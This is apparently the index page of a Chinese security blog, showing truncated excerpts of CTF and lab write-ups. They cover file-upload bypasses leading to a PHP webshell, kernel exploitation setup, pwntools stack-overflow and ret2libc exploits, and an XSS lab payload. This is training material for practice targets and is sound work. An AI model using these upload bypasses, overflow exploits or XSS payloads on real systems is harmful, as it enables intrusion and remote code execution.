一个帮你总结所有类型的上传漏洞的靶场 Pass-01 在js中发现校验文件后缀的函数，我们添加php类型后在控制台更改然后上传shell 上传shell之后在返回的数据中发现了shell的路径，然后用蚁剑连接即可 Pass-02 这关是服务器验证，首先试了php后缀，当然是不行的，然后继续试了1.php.jpg是可以上传的，1.php.asd是不可以上传的，所以可以知道是白名单绕过，然后没思路看了提示和源码发现是检验了数据包的content-type，所以上传php的时候抓包修改content-type为image/jpeg来绕过上传即可 Pass-03 上传php的时候 ...

前面做了一道kernel-uaf的题，接着复现一下kernel-rop的题目 环境分析 首先按照kernel pwn的套路，先解压core.cpio文件，查看init文件 123456789101112131415161718192021222324#!/bin/shmount -t proc proc /procmount -t sysfs sysfs /sysmount -t devtmpfs none /dev/sbin/mdev -smkdir -p /dev/ptsmount -vt devpts -o gid=4,mode=620 none /dev/ptschmod 666 / ...

这是一道kernel uaf的题目，记录一下一般拿到kernel pwn题应该如何操作，首先拿到题目解压后有3个文件 boot.sh: 一个用于启动 kernel 的 shell 的脚本，多用 qemu，保护措施与 qemu 不同的启动参数有关 bzImage: kernel binary rootfs.cpio: 文件系统映像 所以先新建一个文件夹，然后解压文件系统映像 1234mkdir fscd fscp ../rootfs.cpio ./cpio -idmv < rootfs.cpio 然后查看init文件的内容，可以知道babydriver.ko就是我们需要分析的 ...

照着师傅们的教程弄的，顺便记录一些自己遇到的问题 编译内核 or 下载内核自己编译内核 安装所需要的依赖 12sudo apt-get updatesudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc 下载kernel源码，这里我下载的是4.4.72版本 解压源码，然后在源码目录 1make menuconfig 123456进入kernel hacking勾选以下项目Kernel debuggingCompile-time checks and compiler op ...

题目链接pwn100 一开始没看懂程序在干嘛，但是从fork函数和开了canary可以联想到使用stack smash泄漏canary然后rop，后来才读懂程序是对我们的输入进行base64解码，v21数组用于存放解码后的数据，然后我们可以输入0x200的base64数据，0x200/4*3=384大于v21的数组大小，所以产生了缓冲区溢出，通过这个来泄漏canary然后rop exp: 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950#coding:ut ...

题目链接lin 有个后门，有栈溢出，但是程序会检测返回地址，直接把返回地址改到这里绕过 exp : 12345678910from pwn import *p = process('./lin')payload = 'a'*0x20 + 'b'*8 + p64(0x400977)gdb.attach(p,'b *0x400a96')p.recvuntil('check?\n> ')p.sendline(payload)p.interactive() LFYH 程序有个栈溢出，但是溢出 ...

boorsheet 利用uaf劫持程序控制流 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126from p ...

题目链接messageb0x 教科书般的32位栈溢出(不懂得可以看一步一步学rop 32位)，首先rop利用puts函数泄漏puts真实地址得到libc基址，然后得到system地址，/bin/sh地址再rop到有溢出地方执行system(‘/bin/sh\x00’) exp: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546from pwn import *context.log_level = 'debug'#p = process('./m ...

在知识星球上看到别人发的一个XSS靶场，刚好适合刷完sql-labs的我学习XSS level1 没有任何过滤，直接URL后面加XSS测试语句弹窗 exp: 1http://localhost/xss_test/level1.php?name=123<script>alert('123')</script>; level2 有搜索框，像第一关一样在搜索框测试一下，但是没有像第一关一样弹窗 查看源码发现我们的XSS语句被赋值给value并且在input标签里，所以我们需要闭合value和input标签就可以正常弹窗了 11"&g ...

tcache是libc2.26之后引进的一种新机制，之前一直没做到，然后做几道题熟悉一下 原理及机制 简单来说就是类似fastbin一样的东西，每条链上最多可以有 7 个 chunk，free的时候当tcache满了才放入fastbin，unsorted bin，malloc的时候优先去tcache找 http://m4x.fun/post/dive-into-tcache/ https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/tcache_attack/#tcache-makes-heap-exploitation-easy- ...